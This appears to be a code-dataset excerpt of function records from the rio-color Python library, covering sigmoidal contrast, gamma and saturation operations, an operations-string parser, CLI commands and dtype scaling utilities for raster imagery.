bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | parse_operations | python | def parse_operations(ops_string):
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result | Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L207-L286 | [
"def _op_factory(func, kwargs, opname, bands, rgb_op=False):\n \"\"\"create an operation function closure\n don't call directly, use parse_operations\n returns a function which itself takes and returns ndarrays\n \"\"\"\n\n def f(arr):\n # Avoid mutation by copying\n newarr = arr.copy()... | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
|
mapbox/rio-color | rio_color/scripts/cli.py | check_jobs | python | def check_jobs(jobs):
if jobs == 0:
raise click.UsageError("Jobs must be >= 1 or == -1")
elif jobs < 0:
import multiprocessing
jobs = multiprocessing.cpu_count()
return jobs | Validate number of jobs. | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/scripts/cli.py#L22-L30 | null | """Main CLI."""
import click
import rasterio
from rasterio.rio.options import creation_options
from rasterio.transform import guard_transform
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations, simple_atmo_opstring
import riomucho
jobs_opt = click.option(
"--jobs",
"-j",
type=int,
default=1,
help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1",
)
@click.command("color")
@jobs_opt
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.argument("src_path", type=click.Path(exists=True))
@click.argument("dst_path", type=click.Path(exists=False))
@click.argument("operations", nargs=-1, required=True)
@click.pass_context
@creation_options
def color(ctx, jobs, out_dtype, src_path, dst_path, operations, creation_options):
"""Color correction
Operations will be applied to the src image in the specified order.
Available OPERATIONS include:
\b
"gamma BANDS VALUE"
Applies a gamma curve, brightening or darkening midtones.
VALUE > 1 brightens the image.
\b
"sigmoidal BANDS CONTRAST BIAS"
Adjusts the contrast and brightness of midtones.
BIAS > 0.5 darkens the image.
\b
"saturation PROPORTION"
Controls the saturation in LCH color space.
PROPORTION = 0 results in a grayscale image
PROPORTION = 1 results in an identical image
PROPORTION = 2 is likely way too saturated
BANDS are specified as a single arg, no delimiters
\b
`123` or `RGB` or `rgb` are all equivalent
Example:
\b
rio color -d uint8 -j 4 input.tif output.tif \\
gamma 3 0.95, sigmoidal rgb 35 0.13
"""
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"ops_string": " ".join(operations), "out_dtype": out_dtype}
# Just run this for validation this time
# parsing will be run again within the worker
# where its returned value will be used
try:
parse_operations(args["ops_string"])
except ValueError as e:
raise click.UsageError(str(e))
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
color_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = color_worker(rasters, window, ij, args)
dest.write(arr, window=window)
dest.colorinterp = src.colorinterp
@click.command("atmos")
@click.option(
"--atmo",
"-a",
type=click.FLOAT,
default=0.03,
help="How much to dampen cool colors, thus cutting through "
"haze. 0..1 (0 is none), default: 0.03.",
)
@click.option(
"--contrast",
"-c",
type=click.FLOAT,
default=10,
help="Contrast factor to apply to the scene. -infinity..infinity"
"(0 is none), default: 10.",
)
@click.option(
"--bias",
"-b",
type=click.FLOAT,
default=0.15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..1 (0.5 is none), default: 0.15",
)
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.option(
"--as-color",
is_flag=True,
default=False,
help="Prints the equivalent rio color command to stdout."
"Does NOT run either command, SRC_PATH will not be created",
)
@click.argument("src_path", required=True)
@click.argument("dst_path", type=click.Path(exists=False))
@jobs_opt
@creation_options
@click.pass_context
def atmos(
ctx,
atmo,
contrast,
bias,
jobs,
out_dtype,
src_path,
dst_path,
creation_options,
as_color,
):
"""Atmospheric correction
"""
if as_color:
click.echo(
"rio color {} {} {}".format(
src_path, dst_path, simple_atmo_opstring(atmo, contrast, bias)
)
)
exit(0)
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"atmo": atmo, "contrast": contrast, "bias": bias, "out_dtype": out_dtype}
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
atmos_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = atmos_worker(rasters, window, ij, args)
dest.write(arr, window=window)
|
mapbox/rio-color | rio_color/scripts/cli.py | color | python | def color(ctx, jobs, out_dtype, src_path, dst_path, operations, creation_options):
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"ops_string": " ".join(operations), "out_dtype": out_dtype}
# Just run this for validation this time
# parsing will be run again within the worker
# where its returned value will be used
try:
parse_operations(args["ops_string"])
except ValueError as e:
raise click.UsageError(str(e))
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
color_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = color_worker(rasters, window, ij, args)
dest.write(arr, window=window)
dest.colorinterp = src.colorinterp | Color correction
Operations will be applied to the src image in the specified order.
Available OPERATIONS include:
\b
"gamma BANDS VALUE"
Applies a gamma curve, brightening or darkening midtones.
VALUE > 1 brightens the image.
\b
"sigmoidal BANDS CONTRAST BIAS"
Adjusts the contrast and brightness of midtones.
BIAS > 0.5 darkens the image.
\b
"saturation PROPORTION"
Controls the saturation in LCH color space.
PROPORTION = 0 results in a grayscale image
PROPORTION = 1 results in an identical image
PROPORTION = 2 is likely way too saturated
BANDS are specified as a single arg, no delimiters
\b
`123` or `RGB` or `rgb` are all equivalent
Example:
\b
rio color -d uint8 -j 4 input.tif output.tif \\
gamma 3 0.95, sigmoidal rgb 35 0.13 | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/scripts/cli.py#L46-L121 | [
"def color_worker(srcs, window, ij, args):\n \"\"\"A user function.\"\"\"\n src = srcs[0]\n arr = src.read(window=window)\n arr = to_math_type(arr)\n\n for func in parse_operations(args[\"ops_string\"]):\n arr = func(arr)\n\n # scaled 0 to 1, now scale to outtype\n return scale_dtype(arr... | """Main CLI."""
import click
import rasterio
from rasterio.rio.options import creation_options
from rasterio.transform import guard_transform
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations, simple_atmo_opstring
import riomucho
jobs_opt = click.option(
"--jobs",
"-j",
type=int,
default=1,
help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1",
)
def check_jobs(jobs):
"""Validate number of jobs."""
if jobs == 0:
raise click.UsageError("Jobs must be >= 1 or == -1")
elif jobs < 0:
import multiprocessing
jobs = multiprocessing.cpu_count()
return jobs
@click.command("color")
@jobs_opt
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.argument("src_path", type=click.Path(exists=True))
@click.argument("dst_path", type=click.Path(exists=False))
@click.argument("operations", nargs=-1, required=True)
@click.pass_context
@creation_options
@click.command("atmos")
@click.option(
"--atmo",
"-a",
type=click.FLOAT,
default=0.03,
help="How much to dampen cool colors, thus cutting through "
"haze. 0..1 (0 is none), default: 0.03.",
)
@click.option(
"--contrast",
"-c",
type=click.FLOAT,
default=10,
help="Contrast factor to apply to the scene. -infinity..infinity"
"(0 is none), default: 10.",
)
@click.option(
"--bias",
"-b",
type=click.FLOAT,
default=0.15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..1 (0.5 is none), default: 0.15",
)
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.option(
"--as-color",
is_flag=True,
default=False,
help="Prints the equivalent rio color command to stdout."
"Does NOT run either command, SRC_PATH will not be created",
)
@click.argument("src_path", required=True)
@click.argument("dst_path", type=click.Path(exists=False))
@jobs_opt
@creation_options
@click.pass_context
def atmos(
ctx,
atmo,
contrast,
bias,
jobs,
out_dtype,
src_path,
dst_path,
creation_options,
as_color,
):
"""Atmospheric correction
"""
if as_color:
click.echo(
"rio color {} {} {}".format(
src_path, dst_path, simple_atmo_opstring(atmo, contrast, bias)
)
)
exit(0)
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"atmo": atmo, "contrast": contrast, "bias": bias, "out_dtype": out_dtype}
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
atmos_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = atmos_worker(rasters, window, ij, args)
dest.write(arr, window=window)
|
mapbox/rio-color | rio_color/scripts/cli.py | atmos | python | def atmos(
ctx,
atmo,
contrast,
bias,
jobs,
out_dtype,
src_path,
dst_path,
creation_options,
as_color,
):
if as_color:
click.echo(
"rio color {} {} {}".format(
src_path, dst_path, simple_atmo_opstring(atmo, contrast, bias)
)
)
exit(0)
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"atmo": atmo, "contrast": contrast, "bias": bias, "out_dtype": out_dtype}
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
atmos_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = atmos_worker(rasters, window, ij, args)
dest.write(arr, window=window) | Atmospheric correction | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/scripts/cli.py#L167-L220 | [
"def atmos_worker(srcs, window, ij, args):\n \"\"\"A simple atmospheric correction user function.\"\"\"\n src = srcs[0]\n rgb = src.read(window=window)\n rgb = to_math_type(rgb)\n\n atmos = simple_atmo(rgb, args[\"atmo\"], args[\"contrast\"], args[\"bias\"])\n\n # should be scaled 0 to 1, scale to... | """Main CLI."""
import click
import rasterio
from rasterio.rio.options import creation_options
from rasterio.transform import guard_transform
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations, simple_atmo_opstring
import riomucho
jobs_opt = click.option(
"--jobs",
"-j",
type=int,
default=1,
help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1",
)
def check_jobs(jobs):
"""Validate number of jobs."""
if jobs == 0:
raise click.UsageError("Jobs must be >= 1 or == -1")
elif jobs < 0:
import multiprocessing
jobs = multiprocessing.cpu_count()
return jobs
@click.command("color")
@jobs_opt
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.argument("src_path", type=click.Path(exists=True))
@click.argument("dst_path", type=click.Path(exists=False))
@click.argument("operations", nargs=-1, required=True)
@click.pass_context
@creation_options
def color(ctx, jobs, out_dtype, src_path, dst_path, operations, creation_options):
"""Color correction
Operations will be applied to the src image in the specified order.
Available OPERATIONS include:
\b
"gamma BANDS VALUE"
Applies a gamma curve, brightening or darkening midtones.
VALUE > 1 brightens the image.
\b
"sigmoidal BANDS CONTRAST BIAS"
Adjusts the contrast and brightness of midtones.
BIAS > 0.5 darkens the image.
\b
"saturation PROPORTION"
Controls the saturation in LCH color space.
PROPORTION = 0 results in a grayscale image
PROPORTION = 1 results in an identical image
PROPORTION = 2 is likely way too saturated
BANDS are specified as a single arg, no delimiters
\b
`123` or `RGB` or `rgb` are all equivalent
Example:
\b
rio color -d uint8 -j 4 input.tif output.tif \\
gamma 3 0.95, sigmoidal rgb 35 0.13
"""
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"ops_string": " ".join(operations), "out_dtype": out_dtype}
# Just run this for validation this time
# parsing will be run again within the worker
# where its returned value will be used
try:
parse_operations(args["ops_string"])
except ValueError as e:
raise click.UsageError(str(e))
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
color_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = color_worker(rasters, window, ij, args)
dest.write(arr, window=window)
dest.colorinterp = src.colorinterp
@click.command("atmos")
@click.option(
"--atmo",
"-a",
type=click.FLOAT,
default=0.03,
help="How much to dampen cool colors, thus cutting through "
"haze. 0..1 (0 is none), default: 0.03.",
)
@click.option(
"--contrast",
"-c",
type=click.FLOAT,
default=10,
help="Contrast factor to apply to the scene. -infinity..infinity"
"(0 is none), default: 10.",
)
@click.option(
"--bias",
"-b",
type=click.FLOAT,
default=0.15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..1 (0.5 is none), default: 0.15",
)
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.option(
"--as-color",
is_flag=True,
default=False,
help="Prints the equivalent rio color command to stdout."
"Does NOT run either command, SRC_PATH will not be created",
)
@click.argument("src_path", required=True)
@click.argument("dst_path", type=click.Path(exists=False))
@jobs_opt
@creation_options
@click.pass_context
|
mapbox/rio-color | rio_color/utils.py | to_math_type | python | def to_math_type(arr):
max_int = np.iinfo(arr.dtype).max
return arr.astype(math_type) / max_int | Convert an array from native integer dtype range to 0..1
scaling down linearly | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/utils.py#L15-L20 | null | """Color utilities."""
import numpy as np
import re
# The type to be used for all intermediate math
# operations. Should be a float because values will
# be scaled to the range 0..1 for all work.
math_type = np.float64
epsilon = np.finfo(math_type).eps
def scale_dtype(arr, dtype):
"""Convert an array from 0..1 to dtype, scaling up linearly
"""
max_int = np.iinfo(dtype).max
return (arr * max_int).astype(dtype)
def magick_to_rio(convert_opts):
"""Translate a limited subset of imagemagick convert commands
to rio color operations
Parameters
----------
convert_opts: String, imagemagick convert options
Returns
-------
operations string, ordered rio color operations
"""
ops = []
bands = None
def set_band(x):
global bands
if x.upper() == "RGB":
x = "RGB"
bands = x.upper()
set_band("RGB")
def append_sig(arg):
global bands
args = list(filter(None, re.split("[,x]+", arg)))
if len(args) == 1:
args.append(0.5)
elif len(args) == 2:
args[1] = float(args[1].replace("%", "")) / 100.0
ops.append("sigmoidal {} {} {}".format(bands, *args))
def append_gamma(arg):
global bands
ops.append("gamma {} {}".format(bands, arg))
def append_sat(arg):
args = list(filter(None, re.split("[,x]+", arg)))
# ignore args[0]
# convert to proportion
prop = float(args[1]) / 100
ops.append("saturation {}".format(prop))
nextf = None
for part in convert_opts.strip().split(" "):
if part == "-channel":
nextf = set_band
elif part == "+channel":
set_band("RGB")
nextf = None
elif part == "-sigmoidal-contrast":
nextf = append_sig
elif part == "-gamma":
nextf = append_gamma
elif part == "-modulate":
nextf = append_sat
else:
if nextf:
nextf(part)
nextf = None
return " ".join(ops)
|
mapbox/rio-color | rio_color/utils.py | scale_dtype | python | def scale_dtype(arr, dtype):
max_int = np.iinfo(dtype).max
return (arr * max_int).astype(dtype) | Convert an array from 0..1 to dtype, scaling up linearly | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/utils.py#L23-L27 | null | """Color utilities."""
import numpy as np
import re
# The type to be used for all intermediate math
# operations. Should be a float because values will
# be scaled to the range 0..1 for all work.
math_type = np.float64
epsilon = np.finfo(math_type).eps
def to_math_type(arr):
"""Convert an array from native integer dtype range to 0..1
scaling down linearly
"""
max_int = np.iinfo(arr.dtype).max
return arr.astype(math_type) / max_int
def magick_to_rio(convert_opts):
"""Translate a limited subset of imagemagick convert commands
to rio color operations
Parameters
----------
convert_opts: String, imagemagick convert options
Returns
-------
operations string, ordered rio color operations
"""
ops = []
bands = None
def set_band(x):
global bands
if x.upper() == "RGB":
x = "RGB"
bands = x.upper()
set_band("RGB")
def append_sig(arg):
global bands
args = list(filter(None, re.split("[,x]+", arg)))
if len(args) == 1:
args.append(0.5)
elif len(args) == 2:
args[1] = float(args[1].replace("%", "")) / 100.0
ops.append("sigmoidal {} {} {}".format(bands, *args))
def append_gamma(arg):
global bands
ops.append("gamma {} {}".format(bands, arg))
def append_sat(arg):
args = list(filter(None, re.split("[,x]+", arg)))
# ignore args[0]
# convert to proportion
prop = float(args[1]) / 100
ops.append("saturation {}".format(prop))
nextf = None
for part in convert_opts.strip().split(" "):
if part == "-channel":
nextf = set_band
elif part == "+channel":
set_band("RGB")
nextf = None
elif part == "-sigmoidal-contrast":
nextf = append_sig
elif part == "-gamma":
nextf = append_gamma
elif part == "-modulate":
nextf = append_sat
else:
if nextf:
nextf(part)
nextf = None
return " ".join(ops)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.